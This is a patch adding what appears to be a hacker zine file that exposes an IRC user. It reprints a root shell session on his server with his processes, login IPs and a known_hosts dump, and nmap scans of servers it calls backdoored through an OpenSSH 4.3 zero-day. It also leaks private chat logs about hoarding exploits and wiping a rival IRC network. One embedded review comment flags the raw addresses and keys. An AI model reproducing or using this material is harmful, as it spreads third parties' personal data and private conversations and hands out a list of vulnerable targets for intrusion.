+ANTISECFORLULZ	romeo      27845  0.0  0.1  2040  1376  p2  S+    2:20PM   0:00.04 screen -r				      ANTISECFORLULZ
+ANTISECFORLULZ	romeo      98652  0.0  0.2  3244  1848  p2  Is   12:16PM   0:00.03 -bash (bash)				      ANTISECFORLULZ
+ANTISECFORLULZ	root       32868  0.0  0.1  1552   872  p3  L+    4:23PM   0:00.00 grep romeo				      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ	[root@velocity:/]# killall screen									      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ	[00:25:59] * Quits: @pimpinjg (FBI@tdirc-1243C38A.deploy.akamaitechnologies.com) (Quit: Lost terminal)	      ANTISECFORLULZ
+ANTISECFORLULZ	[00:25:59] * Quits: &RoMeO (root@DarkMindZ.com) (Quit: Lost terminal)					      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ	[12:29am] <~RoMeO> wtf is up with screen :@ 								      ANTISECFORLULZ
+ANTISECFORLULZ	[12:29am] <+G-Brain> 23:26 -!- RoMeO [root@DarkMindZ.com] has quit [Quit: Lost terminal]		      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <~RoMeO> "[screen is terminating]" with no reason						      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <+G-Brain> hah										      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <%p3ri0d> oh yeah										      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <+G-Brain> it has a few shitty default key bindings						      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <~RoMeO> ctrl+D										      ANTISECFORLULZ
+ANTISECFORLULZ	[12:30am] <~RoMeO> didnt do that									      ANTISECFORLULZ
+ANTISECFORLULZ	[12:33am] <~RoMeO> gay shit										      ANTISECFORLULZ
+ANTISECFORLULZ	[12:33am] <+G-Brain> [romeo@juliet]$ pkill -9 screen							      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZ														      ANTISECFORLULZ
+ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
+
+[root@velocity:/]# last | grep romeo
+romeo            ttyp3    188.50.84.224    Thu Jul  2 23:06 - 00:24  (01:17)
+romeo            ttyp0    188.50.84.224    Thu Jul  2 22:53 - 01:52  (02:58)
+romeo            ttyp6    188.51.85.13     Thu Jul  2 14:49 - 17:59  (03:09)
+romeo            ttyp5    188.51.85.13     Thu Jul  2 12:12   still logged in
+romeo            ttyp5    188.51.85.13     Thu Jul  2 11:02 - 11:05  (00:02)
+romeo            ttyp5    188.51.85.13     Wed Jul  1 20:29 - 20:29  (00:00)
+
+[root@velocity:/]# cat ~/ssh/known_hosts 
+light.co1.org ssh-dss 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
+zelda.vitalspeeds.com ssh-dss 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
+72.20.18.193 ssh-dss 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
+72.20.18.144 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
+88.196.163.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4wjPA3bTL9ZvD137cH5sn8QnvuyMiZN13SF1gnojBAVC2EA1xO0F9okHLukDL+gTEOpbN+JA0W4rMrzAe58+dhSBpSSJlGnNwb14jLEp6GxYDn31+SRns8RWgprq7b/AD7aBUimlE2ExB9I57HIm31XVfO5QsMlg9EW2//4E6vU=
+ntora.eml.ee,194.204.32.101 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzoxPtx6AsAOJ+ZZmvtHHBWDi+mH9meDP24M9FPpxAn7lmoXDFlftNURU83/LjTMcym+jsbPVFMC3w6HrRyQQ8v8GFJVR9z/hfKFlUzEUEO7TX1UK39Mswo90wbTwhOpwD3/XkP6YsPZQwN+EN5x37oH9PCXs9KxVCAju0alSrw0=
+72.20.18.145 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
+localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
+corp.efnet.net,66.63.177.130 ssh-dss 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
+72.20.28.202 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
+98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
+98.192.246.70 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5iUbneFne+6pmfWqlHfXk19SpS8GAM6peFONJOQXMOhTYKnQvZg+3H4eP0aa3gr0ejDbr/UCyZugRez31OolzZsICM99dSE1yIdD57XFczY0QxffOz5C40dQvlfvNmQXRSptqYygHLJIvm1p6qpyZrnrhRwV5OiNogYLLMQqKRFxOlJWUEa/78mgfQ/LI3Edu1JX79cfhmYKak+WAs+ph3yn70HiFemksr3xJ7G2GQxGsg7jkbAnsrcsSO3KkI99uy9HN+dB2+sEu18kVzEYdKz0T1pjNZ3B5o2B55GhEsoHvrqpBNRmXT7jJcD4v0m0NqYfbFwmj4/x1ykfbmVf7w==
+189.14.205.42 ssh-dss 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
+makosolutions.com,67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
+89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
+quad1.ircvps.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
+
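Review bot: the `lsof` listing, the `last | grep romeo` output and the `cat ~/ssh/known_hosts` dump in this part of anti-anti-sec/anti-anti-sec.txt are committed with third-party IP addresses, hostnames and full host public keys intact, and nothing in the patch records where the text was mirrored from. If the file is meant to be a byte-for-byte copy of the zine, add the source and a checksum of the original to README.md so the import can be verified. If it is not, consider whether the raw addresses and key blobs need to be in the tree at all, or whether a redacted copy serves the mirror equally well.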
+// Backdoored Servers (Makosolutions, Efnet, IRCVPS, etc..) all running OpenSSH <= 4.3
+
+NMap Scans of all servers compromised
+-------------------------------------
+
+1. nmap -v -sV -P0 webhostline.com -p 2222
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Initiating Parallel DNS resolution of 1 host. at 11:28
+Completed Parallel DNS resolution of 1 host. at 11:28, 0.09s elapsed
+Initiating SYN Stealth Scan at 11:28
+Scanning 6696220213.hostnoc.net (66.96.220.213) [1 port]
+Discovered open port 2222/tcp on 66.96.220.213
+Completed SYN Stealth Scan at 11:28, 0.77s elapsed (1 total ports)
+Initiating Service scan at 11:28
+Scanning 1 service on 6696220213.hostnoc.net (66.96.220.213)
+Completed Service scan at 11:28, 0.57s elapsed (1 service on 1 host)
+NSE: Script scanning 66.96.220.213.
+NSE: Script Scanning completed.
+Host 6696220213.hostnoc.net (66.96.220.213) is up (0.24s latency).
+Interesting ports on 6696220213.hostnoc.net (66.96.220.213):
+PORT     STATE SERVICE VERSION
+2222/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 48 (4086B)
+
+
+2. nmap -v -sV -P0 -p 22 vitalspeeds.com
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Initiating Parallel DNS resolution of 1 host. at 11:28
+Completed Parallel DNS resolution of 1 host. at 11:28, 0.02s elapsed
+Initiating SYN Stealth Scan at 11:28
+Scanning ukscene.diyhost.co.uk (66.197.170.181) [1 port]
+Discovered open port 22/tcp on 66.197.170.181
+Completed SYN Stealth Scan at 11:28, 0.82s elapsed (1 total ports)
+Initiating Service scan at 11:28
+Scanning 1 service on ukscene.diyhost.co.uk (66.197.170.181)
+Completed Service scan at 11:28, 0.52s elapsed (1 service on 1 host)
+NSE: Script scanning 66.197.170.181.
+NSE: Script Scanning completed.
+Host ukscene.diyhost.co.uk (66.197.170.181) is up (0.25s latency).
+Interesting ports on ukscene.diyhost.co.uk (66.197.170.181):
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+
+3. nmap -v -sV -P0 -p 22 stardustdawn.com
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Initiating Parallel DNS resolution of 1 host. at 11:29
+Completed Parallel DNS resolution of 1 host. at 11:29, 0.69s elapsed
+Initiating SYN Stealth Scan at 11:29
+Scanning mx101.stardustdawn.com (64.191.69.101) [1 port]
+Discovered open port 22/tcp on 64.191.69.101
+Completed SYN Stealth Scan at 11:29, 0.80s elapsed (1 total ports)
+Initiating Service scan at 11:29
+Scanning 1 service on mx101.stardustdawn.com (64.191.69.101)
+Completed Service scan at 11:29, 0.60s elapsed (1 service on 1 host)
+NSE: Script scanning 64.191.69.101.
+NSE: Script Scanning completed.
+Host mx101.stardustdawn.com (64.191.69.101) is up (0.24s latency).
+Interesting ports on mx101.stardustdawn.com (64.191.69.101):
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+
+
+4. nmap -v -sV -P0 -p 2022 irc.indoirc.net
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Warning: Hostname irc.indoirc.net resolves to 2 IPs. Using 70.34.192.50.
+Initiating Parallel DNS resolution of 1 host. at 11:29
+Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
+Initiating SYN Stealth Scan at 11:29
+Scanning ip-70-34-192-50.razorservers.com (70.34.192.50) [1 port]
+Discovered open port 2022/tcp on 70.34.192.50
+Completed SYN Stealth Scan at 11:29, 0.82s elapsed (1 total ports)
+Initiating Service scan at 11:29
+Scanning 1 service on ip-70-34-192-50.razorservers.com (70.34.192.50)
+Completed Service scan at 11:29, 0.55s elapsed (1 service on 1 host)
+NSE: Script scanning 70.34.192.50.
+NSE: Script Scanning completed.
+Host ip-70-34-192-50.razorservers.com (70.34.192.50) is up (0.26s latency).
+Interesting ports on ip-70-34-192-50.razorservers.com (70.34.192.50):
+PORT     STATE SERVICE VERSION
+2022/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+
+5. nmap -v -sV -P0 -p 22 absolute.ownage.net
+
+Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 12:23 GTB Daylight Tim
+e
+NSE: Loaded 3 scripts for scanning.
+Initiating Parallel DNS resolution of 1 host. at 12:23
+Completed Parallel DNS resolution of 1 host. at 12:23, 0.51s elapsed
+Initiating SYN Stealth Scan at 12:23
+Scanning absolute.ownage.net (72.20.28.205) [1 port]
+Discovered open port 22/tcp on 72.20.28.205
+Completed SYN Stealth Scan at 12:23, 0.88s elapsed (1 total ports)
+Initiating Service scan at 12:23
+Scanning 1 service on absolute.ownage.net (72.20.28.205)
+Completed Service scan at 12:23, 0.64s elapsed (1 service on 1 host)
+NSE: Script scanning 72.20.28.205.
+NSE: Script Scanning completed.
+Host absolute.ownage.net (72.20.28.205) is up (0.31s latency).
+Interesting ports on absolute.ownage.net (72.20.28.205):
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 4.3 (protocol 1.99)
+
+Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
+           Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
+// OpenSSH upgraded to 5.2 
+
+6. nmap -sV -p 22 ircvps.com
+
+Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-19 13:37 GTB Standard Time
+Interesting ports on s69-163-34-138.in-addr.arpa.static.dsn1.net (69.163.34.138)
+:
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 4.3 (protocol 2.0)
+
+Service detection performed. Please report any incorrect results at http://nmap.
+org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds
+
+
+7. anti-sec:~/pwn# ./map ssanz.net
+
+IP: 66.197.143.133 ( osiris.ssanz.net )
+WWW: Apache/2.2.11
+SSH: SSH-2.0-OpenSSH_4.3
+
+IP: 66.197.204.101 ( devil.ssanz.net )
+WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
+mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
+SSH: SSH-2.0-OpenSSH_4.3
+
+
+8. Astalavista
+
+[7/4/2009 3:39:52 PM] Glafkos Charalambous: the exploit is openssh v4.3 and below
+[7/4/2009 3:40:17 PM] Glafkos Charalambous: what OS was asta running ?
+[7/4/2009 3:40:28 PM] Pascal Mittner: CentOS
+[7/4/2009 3:40:53 PM] Glafkos Charalambous: centos 5.3 latest version comes with openssh 4.3p2
+
+
+
+ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
+ANTISECFORLULZ				  ANTISECFORLULZ
+ANTISECFORLULZ 	    Private Chat Logs     ANTISECFORLULZ
+ANTISECFORLULZ				  ANTISECFORLULZ
+ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
+
+
+--- Log opened Wed Jun 17 09:05:41 2009
+09:05 [Glyph(Glyph@mods.govsec.org)] might want to be more selective.. your 0day is starting to become apparent with each g0troot
+09:06 -pand!- Irssi: Starting query in bhf with Glyph
+09:07 (RoMeO) wat
+09:07 (Glyph) Need to be more 'selective' 
+09:07 (Glyph) two of two ... tsk, tsk, tsk..
+09:07 (RoMeO) you need to explain more, and why do you think i wrote 'g0troot' or ever used it 
+09:07 (Glyph) If you keep up with that, everyone is gonna now where to look.
+09:08 (RoMeO) and where did you see me use it? lol 
+// Everywhere..
+
+09:08 (Glyph) Doesn't what distro, when there's another 'common element' 
+// OpenSSH <= 4.3
+
+09:08 (Glyph) Just saying need to be more circumspect.
+09:08 (Glyph) Not saying 'you'..
+09:09 (RoMeO) okay :]
+09:09 (Glyph) But I know you'll get w1rd to those responsible.
+09:09 (Glyph) Capice?
+09:09 (RoMeO) will do
+09:09 (Glyph) If the 'perps' keep it up, it won't be a 0day now will it?
+09:10 (RoMeO) ofcourse, but again... i am pretty sure you dont know where to look and if you look hard you will see 'g0troot' only used once in public
+09:10 (RoMeO) so i dont know what do you mean by 'need to stop using it' sicne it was only used once from what i read
+09:11 (Glyph) Rightio.
+09:11 (Glyph) two out of two 
+09:11 (Glyph) Both had a common element.
+09:11 (RoMeO) which is
+09:11 (Glyph) Besides being shitty about 'security'
+09:11 (Glyph) For pay type product.
+09:12 (RoMeO) yeah
+09:12 (RoMeO) the targetted people are publicized
+09:12 (RoMeO) they are the people that say they are security experts while they dont really qualify to be your average noob
+09:12 (RoMeO) the people who publish exploits
+09:13 (RoMeO) people who make money out of free stuff, related to 'security' etc
+09:13 (Glyph) lol.. not yesterday's demo ;)
+09:13 (RoMeO) yesterday was just to prove something to dark
+09:13 (RoMeO) he didnt say a word after that
+09:13 (Glyph) Aye.. but .....
+09:13 (Glyph) tipped the scales in my favour.
+09:14 (Glyph) The more it gets done, the more likely it is the 0day is exposed.
+09:14 (RoMeO) ofcourse
+09:14 (Glyph) Now.. that does NOT mean that all that have the product haven't alreay been 'had'
+09:14 (Glyph) But it does lead to disclosure.
+09:15 (Glyph) 'Even a blind pig finds an acorn every now and then'
+09:15 (RoMeO) sure, i understand
+09:15 (Glyph) And InfoSec isn't st00pid like Dark seems to think. 
+// Really ?
+
+09:15 (RoMeO) i never underestimate anyone
+09:15 (RoMeO) thats my rule 
+
+09:16 (Glyph) If I can already see 'glimpses', you can bet others out there can as well.
+09:17 (RoMeO) let them see it, antisec got more tricks up the sleeves ;p
+09:17  -> Glyph chuckles
+09:17 (Glyph) I'm well aware of that.
+09:17 (Glyph) But don't ya just hate losing 'weaponized' shit for a lark?
+09:18 (Glyph) Put that arrow back in yer quiver.. might be really useful sometime down the road.
+09:18 (RoMeO) yeah, i understand you, and again it was just to prove something to someone... nothing was left behind, those 'acts' rarely ever happen
+09:19 (Glyph) Thing is.. WTF did you need to prove any damn thing to Dark?
+09:19 (Glyph) Scratch that.. change pronouns to third person ;)
+09:19 (RoMeO) its between me and him ;p
+09:19 (RoMeO) he talks alot
+09:21 (Glyph) You know I log the publics?
+09:21 (RoMeO) i assume alot do
+
+09:22 (RoMeO) i just hope you dont log privates
+
+09:37 (RoMeO) so your job is basically... ?
+09:40 (Glyph) Coordinator, IT Research and Special Projects.. in a 2 year college
+09:40 (RoMeO) nice, well i will bbl
+09:41 (Glyph) Ciao.. and yes that's enough info to figure out who I am.
+09:41 (RoMeO) haha
+--- Log closed Wed Jun 17 09:46:34 2009
+
+--- Log opened Wed Jun 17 14:21:36 2009
+14:21 (Glyph) Aye.
+14:22 (Glyph) Don't take the stuff I spin in channel to heart.
+14:22 (RoMeO) :)
+14:22 (Glyph) I'm interested in debating with Dark.
+14:22 (RoMeO) yeah i saw
+14:22 (Glyph) Plus it may actually spark some interest in the subject.
+14:22 (RoMeO) but again, all he does is talk
+14:22 (RoMeO) so what i did when i first met him was
+14:22 (RoMeO) to shut him up
+14:23 (RoMeO) i put him up on a challenge
+14:23 (Glyph) It's a topic that every individual needs to make a decision about.
+14:23 (RoMeO) we made some random guy on irc to post a random security site
+14:23 (RoMeO) and the challenge was who gets access to it first
+14:23 (RoMeO) i got in
+14:23 (RoMeO) he didnt
+14:23 (RoMeO) but he kept on arguing
+14:23 (RoMeO) about how he got vulns on it, but its 'way over my league' rofl
+14:24 (Glyph) You know what that sounds like to me?
+14:24 (RoMeO) what
+14:24 (Glyph) 'tempest in a teacup'
+14:24 (RoMeO) lol
+14:24 (Glyph) Notice he braced me in channel..
+14:24 (Glyph) right.
+14:24 (RoMeO) right
+14:24 (Glyph) 'When did you stop beating your wife sir?'
+14:25 (RoMeO) lol.
+14:25 (Glyph) HE should be presuming that everyone has 'skillz' and can whoop his arse.
+14:25 (RoMeO) he is all about talk, and its not like he just started this, no no, apparently he been around since 2000 and doing the -same- ever since
+14:26 (Glyph) hmmm... I've been around a lot longer than that.
+14:26 (RoMeO) yea, just saying its not like he does that here only or just now
+14:26 (Glyph) Course I can plead ignorance.. not aware of a lot
+14:26 (Glyph) Leopard isn't likely to change its spots
+14:27 (RoMeO) haha
+14:28 (RoMeO) webdevil knows alot about him too, he was there when he got kicked in his lil challenge
+14:28 (RoMeO) and he didnt come back to the channel for a long long time after that
+14:29 (Glyph) I presume you have an account at gso
+14:29 (RoMeO) i dont know honestly
+14:29 (RoMeO) but if ther was, it would be RoMeO
+--- Log closed Wed Jun 17 14:34:34 2009
+
+
+--- Log opened Thu Jun 18 17:35:20 2009
+17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Wheres newtype hang these days?
+17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Its been so long since I've talked with her
+17:35 -pand!- Irssi: Starting query in bhf with Dark
+17:36 (RoMeO) we just met on rizon
+17:36 (RoMeO) for a small chat
+17:36 (Dark) Word
+17:36 (Dark) Can I safely assume she's all up in -antisec?
+17:36 (Dark) In lieu of recent Astalavista incident?
+17:38 (Dark) Well
+17:38 (Dark) If you see her around again
+17:38 (Dark) Tell her Dark says hi
+17:38 (Dark) And thanks for everything
+17:38 (RoMeO) what do yoou mean -antisec
+17:38 (RoMeO) and willl do
+17:39 (Dark) I mean
+17:39 (Dark) She's probably restarting her actions
+17:39 (Dark) In zfo and whatnot
+17:39 (Dark) Just an assumption
+17:39 (RoMeO) i dont know really, but she really liked the latest antisec movement
+17:39 (RoMeO) actions etc
+17:39 (Dark) Good to hear
+17:39 (RoMeO) ^^
+17:40 (Dark) Along time ago she said she had a ICMP exploit for IOS
+17:40 (Dark) I may attempt to locate her and coax it out of her
+17:40 (Dark) Seeing as she's probably not using it anymore
+17:40 (RoMeO) yea, she is out of all this for now
+17:40 (RoMeO) too busy and whatnot
+17:40 (Dark) Haha
+17:41 (Dark) She's majoring in CompSci yea?
+17:41 (RoMeO) yes ;\
+17:41 (Dark) Eh
+17:41 (RoMeO) i hate CS
+17:41 (Dark) Shoulda known
+17:41 (Dark) Same
+17:41 (RoMeO) too broad
+17:41 (Dark) Fucking Linguistics + Econ for great justice
+17:41 (RoMeO) java is gay
+17:42 (Dark) To be honest, I haven't seen alot of the oldschool people for a really long time
+17:42 (RoMeO) yeah
+17:42 (Dark) Theres a few left here and there
+17:42 (RoMeO) everyone gets busy for some time
+17:42 (Dark) I wish they'd pop up
+17:42 (RoMeO) but they all come back eventually
+17:42 (Dark) I guess making a new antisec is where its gotta be
+17:42 (RoMeO) i hope anyways
+17:43 (Dark) I think defcon should go over well
+17:43 (RoMeO) yes, new movement and just wait for people to join from diff communities
+17:43 (Dark) After that
+17:43 (Dark) As I see it
+17:43 (Dark) Its all out war
+17:43 (RoMeO) rawr
+17:43 (Dark) So start saving your exploits nao
+17:43 (RoMeO) hidden in sekret boxen ;O
+17:44 (Dark) For sure
+17:44 (RoMeO) lcirc is being monitored now
+17:44 (RoMeO) they host  #milw0rm and #bottalk
+17:44 (Dark) Probably
+17:45 (RoMeO) no like. i know for sure
+17:45 (Dark) Monitored by pr0jekt types, or by the feds?
+17:45 (RoMeO) pr0ject types
+17:45 (Dark) I figured as much
+17:45 (RoMeO) and feds ofcourse, but pr0ject types got the root shell
+17:46 (Dark) You know what the intentions are?
+17:46 (RoMeO) take down after exposure
+17:46 (RoMeO) intel, private messages, passwords, mail spools, then rm -rf
+17:46 (Dark) can't say I've ever really been to lcirc
+17:46 (RoMeO) should get them all to stop
+17:47 (Dark) Owning milw0rm is a reasonable priority
+17:47 (Dark) As well as Secfocus of course
+17:47 (RoMeO) it is in the right hands
+17:47 (RoMeO) :]
+17:47 (Dark) I've been trying to go rogue on some stuff
+17:47 (Dark) I'm not part of any group per se now that
+17:48 (RoMeO) neither ami
+17:48 (RoMeO) doing it on my own
+17:48 (RoMeO) i function better solo
+--- Log closed Thu Jun 18 18:07:45 2009
+
+--- Log opened Fri Jun 19 09:07:17 2009
+09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] back
+09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] are you excited about leaving?
+09:09 -pand!- Irssi: Starting query in secchat with BSDGurl
+09:09 (RoMeO) well yea ;D
+09:10 (BSDGurl) i was reading the logs this morning and like
+09:11 (BSDGurl) i have to tell romeo good luck and to be safe etc before he leaves
+09:11 (BSDGurl) i know you will have Internet but still
+09:11 (RoMeO) :)
+09:11 (RoMeO) thxthx
+09:11 (BSDGurl) it's kind of scary
+09:12 (BSDGurl) i was scared to start uni here
+09:12 (RoMeO) thats why i moved bounces this week, i will be idle here 24/7 and read logs / messsages at night / whenver i can get online
+09:12 (BSDGurl) hahahaha
+09:12 (RoMeO) lawl, i am excitted
+09:12 (BSDGurl) yes it was like a mix
+09:13 (RoMeO) yea it is a mix of being scared and excitted, but all good
+09:13 (BSDGurl) i hope you learn and are not bored
+09:13 (BSDGurl) do you have maths and things?
+09:13 (RoMeO) no thanks god
+09:13 (BSDGurl) yes
+09:14 (RoMeO) maths might be involved in a few chapters of the software engineeering, but all good
+09:14 (RoMeO) not like computer science for example, which is all around maths and java -_-
+09:14 (BSDGurl) hahahaa java
+09:14 (RoMeO) yea...
+09:14 (BSDGurl) you know i don't hate java
+09:14 (BSDGurl) it's just all those guys
+09:14 (RoMeO) i hate it cause of what i hear from those people
+09:14 (BSDGurl) they ride the nuts
+09:14 (BSDGurl) so hard
+09:14 (RoMeO) lmao
+09:14 (BSDGurl) it's like
+09:14 (BSDGurl) funny
+09:15 (BSDGurl) i can't help it
+09:15 (RoMeO) this friend of mine in uni now
+09:15 (RoMeO) his CS teacher walks in the room daily
+09:15 (RoMeO) and screams
+09:15 (RoMeO) JAVA IS THE FUTURE
+09:15 (RoMeO) :|
+09:15 (BSDGurl) rofl
+09:15 (RoMeO) true story
+09:15 (BSDGurl) they all do
+09:15 (BSDGurl) hahahaha
+09:15 (RoMeO) thats scary lol
+09:15 (BSDGurl) i know
+09:15 (RoMeO) how could java be possibly the future
+09:16 (RoMeO) possibly be*
+09:16 (BSDGurl) that's why i can't help but just say things to piss them off
+09:16 (BSDGurl) i don't even care
+09:16 (RoMeO) every lang got its use, kthxbai
+09:16 (BSDGurl) i am like no
+09:16 (BSDGurl) i don't even know java
